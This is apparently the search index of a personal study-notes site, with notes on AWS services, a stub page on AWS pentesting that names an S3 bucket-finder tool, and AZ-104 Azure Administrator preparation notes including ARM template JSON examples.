                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#storage-classes","title":"Storage classes","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-network","title":"Amazon Network","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-load-balancing-elb","title":"Amazon Elastic Load Balancing (ELB)","text":"

                            A load balancer is a server that will forward the internet traffic down to multiple servers downstream. And for then there will be EC2 instances. They're also called the backend EC2 instances.

                            Elastic load balancing is something that is managed by AWS.

                            Benefits:

                            • ELB can spread the load across multiple downstream instances.
                            • ELB allows you to expose a single point of access, DNS host name, for your application.
                            • ELB can seamlessly handle the failures of downstream instances.
                            • EBL can do regular health checks on them and if one of them is failing, then the load balancer will not direct traffic to that instance.
                            • It provides SSL termination (HTPPS) for your websites.

                            There are 4 kinds: - Application Load Balancer (HTTP/HTTPs only) - Layer 7 - Network Load Balancer (ultra high performance, allows for TCP) - Layer 4 - Gateway Load Balancer - Layer 3. - Classic Load Balancer (retired in 2023) - Layer 4 and 7.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#auto-scaling-groups-asg","title":"Auto Scaling Groups (ASG)","text":"

                            The goal of an auto scaling group is to scale out. That means add EC2 instances to match an increased load or scale in, that means remove EC2 instances to match a decreased load. With this we can ensure that we have, also as well, a minimum, and a maximum number of machines running at any point of time and once the auto scaling group does create, or remove EC2 instances we can make sure that these instances will be registered, or de registered into our load balancer.

                            You can define a minimum size, a maximum size, and a desired capacity.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-migration-tools","title":"Amazon migration tools","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-snow","title":"AWS Snow","text":"
                            • Snowball Edge Storage Optimized & Snowball Edge Compute Optimized
                            • AWS Snowcone & Snowcone SSD
                            • AWS Snowmobile (the truck). 100 PB of capacity.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#edge-computing","title":"Edge Computing","text":"

                            Edge Computing is when you process data while it's being created at an edge location. You can use the Snow Family to run EC2 instances and Lambda functions to do this.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-opshub","title":"AWS OpsHub","text":"

                            OpsHub which is a software that you install on your computer or laptop, so, it's not something you use on the cloud, it's something that you download on your computer. And then once it's connected, it's going to give you a graphical interface to connect to your Snow devices, and configure them and use them.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-databases","title":"AWS Databases","text":"

                            AWS has an offer of managed databases. As benefits, AWS performs quick provisioning, high availability, vertical and horizontal scaling, automated backup, and restore, operations, upgrades, patchings, monitoring, alerting...

                            You can always have an EC\" instance and install a database server, but by using AWS managed database you won't need to configure and mantain all the features from previous paragraph.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#relational-database-service-amazon-rds","title":"Relational Database Service (Amazon RDS)","text":"

                            It's a relational datababase which uses SQL as a query language.

                            • Postgres
                            • MySQL
                            • MAriaDB
                            • Oracle
                            • Microsoft SQL Server
                            • Aurora (AWS Proprietary Database).

                            Note: You can NOT ssh into your instance.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#rds-deployments-read-replicas-multi-az","title":"RDS Deployments: Read Replicas, Multi-AZ","text":"

                            RDS Read Replica

                            • A Replica is a copy of your database. Creating one is a way to scale the read workload. Say you have an application that performs read operations on your database. If you need to scale the workload, you create Read Replica, which are copies of your RDS Database. This will allows your applications to read also from your Replicas. Therefore \u00a0you're distributing the reads to many different RDS databases.
                            • You can create up to Read Replicas.
                            • Data is only written to the one only central RDS tatabase.

                            Multi-AZ

                            • Used for failover in case of AZ outage. In case your RDS crashes, AWS will trigger the replication in a different Availability Zone.

                            Multi-Region

                            Same as Multi-AZ but for different regions. This is usually part of a disater recovery strategy or a plan to have less latency.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-aurora","title":"Amazon Aurora","text":"
                            • Aurora is a proprietary technology from AWS, not open source.
                            • Aurora DB supports Postgres and MySQL.
                            • Aurora is \"AWS Cloud optimized\" and claims 5x performance improvement over MySQL on RDS, over 3x the performance of Postgres on RDS.
                            • Aurora storage aumatically grows in increments of 10 GB, up to 128TB.
                            • Aurora costs more than RDS (20%more) but it's more efficient.
                            • Not in the free tier

                            RDS and Aurora are going to be the two ways for you to create relational databases on AWS. They're both managed and Aurora is going to be more cloud-native, whereas RDS is going to be running the technologies you know, directly as a managed service.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-aurora-serverless","title":"Amazon Aurora Serverless","text":"

                            Amazon Aurora Serverless is a Serverless option for Amazon Aurora where the database instantiation is going to be automated.

                            • Auto-scaling is provided based on actual usage of the database.
                            • Postgres and MySQL are supported as engines of Aurora Serverless database.
                            • No capacity planning needed.
                            • No management needed.
                            • Pay per second, most cost-effective.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elasticache","title":"Amazon ElastiCache","text":"
                            • Elasticache is to get managed Redis or Memcached.
                            • Caches are in-memory databases with high performance, and low latency.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#dynamodb","title":"DynamoDB","text":"
                            • Fully managed highly available with replication across 3 AZ
                            • NoSQL database.
                            • Scales to massive workloads, distributed serverless database.
                            • Millions of requests per seconds: low latency.
                            • Integrated with IAM for security, authorization and administration.
                            • Low cost and auto-scaling capabilities.
                            • Standard and Infrequent Access Table Class.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#dynamodb-accelerator-dax","title":"DynamoDB Accelerator (DAX)","text":"
                            • Fully managed in-memory cache for DynamoDB (for the frequently read objects).
                            • 10x performance improvement.
                            • DAX is only used for and is integrated with DynamoDB, while ElastiCache can be used for other databases.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#dynamodb-global-tables","title":"DynamoDB Global Tables","text":"

                            It makes a DynamoDB table accesible with low latency in multiple-regions. It's a feature of DynamoDB.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#redshift","title":"Redshift","text":"
                            • It's a database on PostgresSQL, but it's not used for Online Transaction Processing (OLTP).
                            • Redshift is Online Analytical Processing (OLAP), used for analytics and data warehousing.
                            • Load data onve every hour.
                            • Columnar storage of data (instead of row based).
                            • Has a SQL interface for performing queries.
                            • Massiverly Parallel Query Execution (MPP).
                            • Bi tools such as AWS Quicksigh or Tableau integrated in it.

                            It has a feature for Serverless: Redshift Serverless.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-mapreduce-emr","title":"Amazon Elastic MapReduce (EMR)","text":"
                            • EMR helps creating Hadoop cluster (Big Data) to analyze and process vast amount of data.
                            • Also supports Apache Spark, HBase, Presto, Flink.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-athena","title":"Amazon Athena","text":"
                            • Amazon Athena is a serverless query service to perform analytics againts S3 objects.
                            • It uses SQL language.
                            • Supports CVS, JSON, ORC, Avro, and Parquet.
                            • Use columnar data.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-quicksight","title":"Amazon QuickSight","text":"

                            Amazon QuickSight is a serverless machine learning-powered business intelligence service to create interactive dashboards.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#documentdb","title":"DocumentDB","text":"
                            • If Aurora is an AWS implementation of Postgres/MySQL, DocumentDB is the same for MongoDB (which is a NoSQL database).
                            • MongoDB is used to store, query and index JSON.
                            • Fully managed database, with replication across AZ.
                            • Automatically scaling.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-neptune","title":"Amazon Neptune","text":"

                            Fully managed graph database. A popular graph dataset would be a social network. Highly available acroos 3 AZ, with up to 15 read replicas. Can store up to billios orelations and query the graph with milliseconds of latency.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-quantum-ledger-database-qldb","title":"Amazon Quantum Ledger Database (QLDB)","text":"
                            • A ledger is a book recording financial transactions. QLDB is going to be just to have a ledger of financial transactions.
                            • It's a fully managed database, it's serverless, highly available, and has replication of data across three AZ.
                            • Used to review history of all the changes made to your application data over time.
                            • Inmutable system: no entry can be removed or modified, cryptographically verifiable.
                            • Difference with Amazon Managed Blockchain: no decentralization component. \u00a0QLDB has a central authority component and it's a ledger, whereas managed blockchain is going to have a de-centralization component as well.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-managed-blockchain","title":"Amazon Managed Blockchain","text":"

                            Managed Blockchain by Amazon is a service to join a public Blockchain networks or create your own scalable private Blockchain network within AWS. And it's compatible with two Blockchain so far, the framework Hyperledger Fabric, and the framework Ethereum.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-glue","title":"Amazon Glue","text":"

                            Glue is a managed extract, transform, and load service, or ETL. Fully serverless service.

                            ETL is very helpful when you have some datasets but they're not exactly in the right form, to do your analytics on them. ETL service prepares and transforms that data.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#glue-data-catalog","title":"Glue Data Catalog","text":"

                            is a catalog of your datasets in your Alias infrastructure, and so this Glue Data Catalog will have a alert reference of everything, the column names, the field names, the field types, et cetera, et cetera.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#database-migration-service-dms","title":"Database Migration Service (DMS)","text":"

                            DMS provides quick and secure database migration into AWS that's going to be resilient and self healing.

                            Supports: Homogeneous migrations and heterogeneous migration.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-compute-services","title":"Amazon Compute Services","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#elastic-container-service-ecs","title":"Elastic Container Service (ECS)","text":"

                            It's the way to launch containers in AWS. You must provision and maintain the ingrastructure (EC2 instances). It has integrations with the Application Load Balancer.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#fargate","title":"Fargate","text":"

                            It's also used to launch containers in AWS, but you don't need to provision the ingrastructure (no EC2 instances to manage).

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#elastic-container-registry-ecr","title":"Elastic Container Registry (ECR)","text":"

                            It's a private docker registry on AWS. The is where you store your docker images.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#lambda","title":"Lambda","text":"
                            • It's a serverless compute service that allows you to run functions in the cloud. We have virtual functions, limited by time and they will run on-demand. You pay per request and compute time.
                            • Lambda is event-driven: functions get invoked by AWS when needed.
                            • It supports many languages.
                            • Lambda can be run as a Lambda Container Image.

                            Api Gateway feature can expose Lambda functions as HTTP API.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-batch","title":"Amazon Batch","text":"

                            Run batch jobs on AWS across EC2 managed instances.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-deployments-and-managing-infrastructure","title":"Amazon: Deployments and managing infrastructure","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-cloudformation","title":"AWS CloudFormation","text":"
                            • Infrastuture as a Service.
                            • It creates the architecture and give you the diagram.
                            • In CloudFormation you rceate an Stack, select template (that generates a yaml), some other configurations, IAM permissions, costs.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloud-development-kit-cdk","title":"Amazon Cloud Development Kit (CDK)","text":"

                            It allows you to define your cloud infrastructure using a familiar language. Code is compiled into a CloudFormation template.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-beanstalk","title":"Amazon Elastic Beanstalk","text":"

                            Elastic Beanstalk is a developer centric view of deploying an application on AWS.

                            It's PaaS.

                            It has a full monitoring suite. Health agent pushes metrics to CloudWatch. Check for app health, publishes health events.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#codedeploy","title":"CodeDeploy","text":"

                            CodeDeploy deploys your application automatically.

                            Hybrid service because it works with ECT and On-premise severs.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codecommit","title":"AWS CodeCommit","text":"

                            It's AWS version control code repository.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codebuild","title":"AWS CodeBuild","text":"

                            It's a Code building service in the cloud. It compiles source code, run test, and produces packages that are ready to be deployed.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codepipeline","title":"AWS CodePipeline","text":"

                            CodePipeline orchestrate the different steps to have the code automatically pushed to production. Basis for CICD (Continuous Integration and Continuous Delivery).

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codeartefact","title":"AWS CodeArtefact","text":"

                            It's a service used to store and retrieve all software packages dependencies to be built. It works with common dependency management tools such as maven, gradle, npm, twine, pip, nuGet. It's an artefact management system.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codestar","title":"AWS CodeStar","text":"

                            Unified UI to easily manage software development activities in one place. It can edit the code in the cloud directly using AWS Cloud9.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-cloud9","title":"AWS Cloud9","text":"

                            AWS Cloud9 is a cloud IDE for writing, running and debugging code directly in the cloud.

                            Code collaboration in real time.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-global-applications","title":"Amazon Global Applications","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-route-53","title":"Amazon Route 53","text":"

                            Managed DNS by AWS. It has A, AAA, or CNAME record.

                            • Simple routing policy (no health checks).
                            • Weighted routing policy (with percentages).
                            • Latency routing policies (based on lacency between users and servers).
                            • Failover routing policy (for disaster recovery).
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloudfront","title":"Amazon CloudFront","text":"

                            It's the Content Delivery Network. So far it has 216 points of presence. It has DDoS protection. Improve read performance, since content is cached at the edge.

                            Origins: S3 (protected with OAC Origin Access Control, that replaces OAI Origin Access Identity), Custom Origin HTTP.

                            Files are cached for a TTL.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#s3-transfer-acceleration","title":"S3 Transfer Acceleration","text":"

                            Increase transfer speed among S3 across regions by using the AWS global network.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-global-accelerator","title":"AWS Global Accelerator","text":"

                            Improve global application availability and performance using the AWS global network.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-outpost","title":"AWS Outpost","text":"

                            AWS Outposts are \"server racks that offer the same AWS infrastructure, service, APIs & tools to build your own applications on-premises just as in the cloud. This allows you to extent your on-premises services to AWS.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-wavelength","title":"AWS WaveLength","text":"

                            AWS WaveLength Zones are infrastructure deployments embedded within the telecommunications providers's datacenters at the edge of 5G networks. It brings AZS services to the edge of the 5G networks. Traffic never leaves the Communication Service Provider (CSP) networks.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloud-integrations","title":"Amazon Cloud integrations","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-sqs","title":"Amazon SQS","text":"

                            It's a simple Queue Service. Two types:

                            • Standard Queue is the oldest AWS offering. It's fully managed service.
                            • FIFO queues.

                            It allows us to decouple

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-kinesis","title":"Amazon Kinesis","text":"

                            It's a real time big data streaming.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-sns","title":"Amazon SNS","text":"

                            Amazon SNS stands for Simple Notification Service. It creates a set of notifications about certain events. Event publishers only sends one message to one SNS topic. Each subscriber to the topic will get all the messages. It's a pub/sub service.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-mq","title":"Amazon MQ","text":"

                            Amazon MQ is a managed message broker service for two technologies, for RabbitMQ and for ActiveMQ.

                            SQS and SNS are cloud-native services because they are proprietary protocols from AWS. They use their own sets of APIs.

                            If you are running traditional application on-premises, you may use open protocols such as MQTT, AMQP, STOMP, Openwire, WSS. And when you're migrating your application to the cloud, you may not want to re-engineer your application to use the SQS and the SNS protocols or APIs. So instead, you wanna use the traditional protocols you used to, such as MQTT, AMQP, and so on. And for this, we can use Amazon MQ.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloud-monitoring","title":"Amazon Cloud Monitoring","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/pentesting-aws/","title":"Pentesting Amazon Web Services (AWS)","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/aws/pentesting-aws/#amazon-s3","title":"Amazon S3","text":"

                            S3 is an object storage service in the AWS cloud service. With S3, you can store objects in buckets. Files stored in an Amazon S3 bucket are called S3 objects.

                            aws-cli is a tool that lists the S3 objects.

                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/aws/pentesting-aws/#enumerate-instances","title":"Enumerate instances","text":"

                            insp3ctor: the AWS bucket finder.

                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/az-104-preparation/","title":"AZ-104 Microsoft Azure Administrator certificate","text":"

                            Sources of this notes

                            • The Microsoft e-learn platform.
                            • Udemy course: Prove your AZ-104 Microsoft Azure Administrator skills to the world. Updated..
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#configure-azure-resources-with-tools","title":"Configure Azure resources with tools","text":"

                            There's approximate parity between the portal, the Azure CLI, and Azure PowerShell with respect to the Azure objects they can administer and the configurations they can create. They're also all cross-platform. Typically, you'll consider several factors when making your choice:

                            • Automation: Do you need to automate a set of complex or repetitive tasks? Azure PowerShell and the Azure CLI support automation, but Azure portal doesn't.
                            • Learning curve: Do you need to complete a task quickly without learning new commands or syntax? The Azure portal doesn't require you to learn syntax or memorize commands. In Azure PowerShell and the Azure CLI, you must know the detailed syntax for each command you use.
                            • Team skillset: Does your team have existing expertise? For example, your team might have used PowerShell to administer Windows. If so, they'll quickly become comfortable using Azure PowerShell.
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-cloud-shell","title":"Azure Cloud Shell","text":"
                            • Is temporary and requires a new or existing Azure Files share to be mounted.
                            • Offers an integrated graphical text editor based on the open-source Monaco Editor.
                            • Authenticates automatically for instant access to your resources.
                            • Runs on a temporary host provided on a per-session, per-user basis.
                            • Times out after 20 minutes without interactive activity.
                            • Requires a resource group, storage account, and Azure File share.
                            • Uses the same Azure file share for both Bash and PowerShell.
                            • Is assigned to one machine per user account.
                            • Persists $HOME using a 5-GB image held in your file share.
                            • Permissions are set as a regular Linux user in Bash.
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-powershell","title":"Azure PowerShell","text":"

                            Azure PowerShell is a module that you add to Windows PowerShell or PowerShell Core to enable you to connect to your Azure subscription and manage resources. Azure PowerShell requires PowerShell to function. PowerShell provides services such as the shell window and command parsing. Azure PowerShell adds the Azure-specific commands.

                            See cheat sheet for Azure Powershell.

                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-cli","title":"Azure CLI","text":"

                            Azure CLI is a command-line program to connect to Azure and execute administrative commands on Azure resources. The Azure CLI is available two ways: inside a browser via the Azure Cloud Shell, or with a local installation on Linux, Mac, or Windows. It allows administrators and developers to execute their commands through a terminal, command-line prompt, or script instead of a web browser.

                            See cheat sheet for Azure CLI.

                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-resource-manager-arm","title":"Azure Resource Manager (ARM)","text":"

                            Azure Resource Manager provides several benefits:

                            • You can deploy, manage, and monitor all the resources for your solution as a group, rather than handling these resources individually.
                            • You can repeatedly deploy your solution throughout the development lifecycle and have confidence your resources are deployed in a consistent state.
                            • You can manage your infrastructure through declarative templates rather than scripts.
                            • You can define the dependencies between resources so they're deployed in the correct order.
                            • You can apply access control to all services in your resource group because Role-Based Access Control (RBAC) is natively integrated into the management platform.
                            • You can apply tags to resources to logically organize all the resources in your subscription.
                            • You can clarify your organization's billing by viewing costs for a group of resources sharing the same tag.

                            Two concepts that I need to review for this:

                            • resource provider\u00a0- A service that supplies the resources you can deploy and manage through Resource Manager. Each resource provider offers operations for working with the resources that are deployed. Some common resource providers are Microsoft.Compute, which supplies the virtual machine resource, Microsoft.Storage, which supplies the storage account resource, and Microsoft.Web, which supplies resources related to web apps. The Microsoft.KeyVault resource provider offers a resource type called vaults for creating the key vault, useful if you want to store keys and secrets. The name of a resource type is in the format: {resource-provider}/{resource-type}. For example, the key vault type is Microsoft.KeyVault/vaults.
                            • declarative syntax\u00a0- Syntax that lets you state \"Here is what I intend to create\" without having to write the sequence of programming commands to create it. The Resource Manager template is an example of declarative syntax. In the file, you define the properties for the infrastructure to deploy to Azure.
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#resource-groups","title":"Resource groups","text":"

                            Creating resource groups:

                            • All the resources in your group should share the same lifecycle. You deploy, update, and delete them together. If one resource, such as a database server, needs to exist on a different deployment cycle it should be in another resource group.
                            • Each resource can only exist in one resource group.
                            • You can add or remove a resource to a resource group at any time.
                            • You can move a resource from one resource group to another group. Limitations do apply to\u00a0moving resources.
                            • A resource group can contain resources that reside in different regions.
                            • A resource group can be used to scope access control for administrative actions.
                            • A resource can interact with resources in other resource groups. This interaction is common when the two resources are related but don't share the same lifecycle (for example, web apps connecting to a database).

                            When creating a resource group, you need to provide a location for that resource group. You may be wondering, \"Why does a resource group need a location? And, if the resources can have different locations than the resource group, why does the resource group location matter at all?\" The resource group stores metadata about the resources. Therefore, when you specify a location for the resource group, you're specifying where that metadata is stored. For compliance reasons, you may need to ensure that your data is stored in a particular region.

                            Moving resources:

                            When moving resources, both the source group and the target group are locked during the operation. Write and delete operations are blocked on the resource groups until the move completes. This lock means you can't add, update, or delete resources in the resource groups. Locks don't mean the resources aren't available. For example, if you move a virtual machine to a new resource group, an application can still access the virtual machine.

                            Move operation support for resources: This page details what resources can be moved between resources group, subscriptions, and regions.

                            To move resources, select the resource group containing those resources, and then select the\u00a0Move\u00a0button. Select the resources to move and the destination resource group. Acknowledge that you need to update scripts.

                            Deleting resources:

                            See how to remove a resource group using Azure powershell.

                            Determine resource limits:

                            • The limits shown are the limits for your subscription.
                            • When you need to increase a default limit, there is a Request Increase link.
                            • All resources have a maximum limit listed in Azure\u00a0limits.
                            • If you are at the maximum limit, the limit can't be increased.
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-resource-manager-locks","title":"Azure Resource Manager Locks","text":"

                            Creating Azure Resource Manager Locks:

                            Resource Manager locks allow organizations to put a structure in place that prevents the accidental deletion of resources in Azure.

                            • You can associate the lock with a subscription, resource group, or resource.
                            • Locks are inherited by child resources.

                            Only the Owner and User Access Administrator roles can create or delete management locks.

                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-resource-manager-template","title":"Azure Resource Manager template","text":"

                            An\u00a0Azure Resource Manager template\u00a0precisely defines all the Resource Manager resources in a deployment. These are some benefits:

                            • Templates improve consistency. Resource Manager templates provide a common language for you and others to describe your deployments. Regardless of the tool or SDK that you use to deploy the template, the structure, format, and expressions inside the template remain the same.
                            • Templates help express complex deployments. Templates enable you to deploy multiple resources in the correct order. For example, you wouldn't want to deploy a virtual machine prior to creating an operating system (OS) disk or network interface. Resource Manager maps out each resource and its dependent resources, and creates dependent resources first. Dependency mapping helps ensure that the deployment is carried out in the correct order.
                            • Templates reduce manual, error-prone tasks. Manually creating and connecting resources can be time consuming, and it's easy to make mistakes. Resource Manager ensures that the deployment happens the same way every time.
                            • Templates are code. Templates express your requirements through code. Think of a template as a type of Infrastructure as Code that can be shared, tested, and versioned similar to any other piece of software. Also, because templates are code, you can create a \"paper trail\" that you can follow. The template code documents the deployment. Most users maintain their templates under some kind of revision control, such as GIT. When you change the template, its revision history also documents how the template (and your deployment) has evolved over time.
                            • Templates promote reuse. Your template can contain parameters that are filled in when the template runs. A parameter can define a username or password, a domain name, and so on. Template parameters enable you to create multiple versions of your infrastructure, such as staging and production, while still using the exact same template.
                            • Templates are linkable. You can link Resource Manager templates together to make the templates themselves modular. You can write small templates that each define a piece of a solution, and then combine them to create a complete system.
                            • Templates simplify orchestration. You only need to deploy the template to deploy all of your resources. Normally this would take multiple operations.

                            The template uses a\u00a0declarative syntax. The declarative syntax is a way of building the structure and elements that outline what resources will look like without describing the control flow. Declarative syntax is different than imperative syntax, which uses commands for the computer to perform. Imperative scripting focuses on specifying each step in deploying the resources.

                            ARM templates are idempotent, which means you can deploy the same template many times and get the same resource types in the same state.

                            Resource Manager orchestrates deploying the resources so they're created in the correct order. When possible, resources will also be created in parallel, so ARM template deployments finish faster than scripted deployments.

                            Resource Manager also has built-in validation. It checks the template before starting the deployment to make sure the deployment will succeed.

                            You can also integrate your ARM templates into continuous integration and continuous deployment (CI/CD) tools like Azure Pipelines.

                            The schema:

                            {\n    \"$schema\": \"http://schema.management.\u200bazure.com/schemas/2019-04-01/deploymentTemplate.json#\",\u200b\n    \"contentVersion\": \"\",\u200b\n    \"parameters\": {},\u200b\n    \"variables\": {},\u200b\n    \"functions\": [],\u200b\n    \"resources\": [],\u200b\n    \"outputs\": {}\u200b\n}\n
                            Element name Required Description $schema Yes Location of the JSON schema file that describes the version of the template language. Use the URL shown in the preceding example. contentVersion Yes Version of the template (such as 1.0.0.0). You can provide any value for this element. Use this value to document significant changes in your template. This value can be used to make sure that the right template is being used. parameters No Values that are provided when deployment is executed to customize resource deployment. variables No Values that are used as JSON fragments in the template to simplify template language expressions. functions No User-defined functions that are available within the template. resources Yes Resource types that are deployed or updated in a resource group. outputs No Values that are returned after deployment.

                            Let's start with parameters:

                            \"parameters\": {\n    \"<parameter-name>\" : {\n        \"type\" : \"<type-of-parameter-value>\",\n        \"defaultValue\": \"<default-value-of-parameter>\",\n        \"allowedValues\": [ \"<array-of-allowed-values>\" ],\n        \"minValue\": <minimum-value-for-int>,\n        \"maxValue\": <maximum-value-for-int>,\n        \"minLength\": <minimum-length-for-string-or-array>,\n        \"maxLength\": <maximum-length-for-string-or-array-parameters>,\n        \"metadata\": {\n        \"description\": \"<description-of-the parameter>\"\n        }\n    }\n}\n

                            This would be an example:

                            \"parameters\": {\n  \"adminUsername\": {\n    \"type\": \"string\",\n    \"metadata\": {\n      \"description\": \"Username for the Virtual Machine.\"\n    }\n  },\n  \"adminPassword\": {\n    \"type\": \"securestring\",\n    \"metadata\": {\n      \"description\": \"Password for the Virtual Machine.\"\n    }\n  }\n}\n

                            You're limited to 256 parameters in a template. You can reduce the number of parameters by using objects that contain multiple properties.

                            Azure Quickstart Templates\u00a0are Azure Resource Manager templates provided by the Azure community. Some templates provide everything you need to deploy your solution, while others might serve as a starting point for your template.

                            • The README.md file provides an overview of what the template does.
                            • The azuredeploy.json file defines the resources that will be deployed.
                            • The azuredeploy.parameters.json file provides the values the template needs.

                            It caught my eye: https://github.com/azure/azure-quickstart-templates/tree/master/application-workloads/blockchain/blockchain

                            You can deploy an ARM template to Azure in one of the following ways: - Deploy a local template - Deploy a linked template - Deploy in a continuous deployment pipeline

                            Example: To add a resource to your template, you'll need to know the resource provider and its types of resources. The syntax for this combination is in the form of {resource-provider}/{resource-type}.

                            See the code:

                            {\n  \"$schema\": \"https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#\",\n  \"contentVersion\": \"1.0.0.1\",\n  \"apiProfile\": \"\",\n  \"parameters\": {},\n  \"variables\": {},\n  \"functions\": [],\n  \"resources\": [\n    {\n      \"type\": \"Microsoft.Storage/storageAccounts\",\n      \"apiVersion\": \"2019-06-01\",\n      \"name\": \"learntemplatestorage123\",\n      \"location\": \"westus\",\n      \"sku\": {\n        \"name\": \"Standard_LRS\"\n      },\n      \"kind\": \"StorageV2\",\n      \"properties\": {\n        \"supportsHttpsTrafficOnly\": true\n      }\n    }\n  ],\n  \"outputs\": {}\n}\n

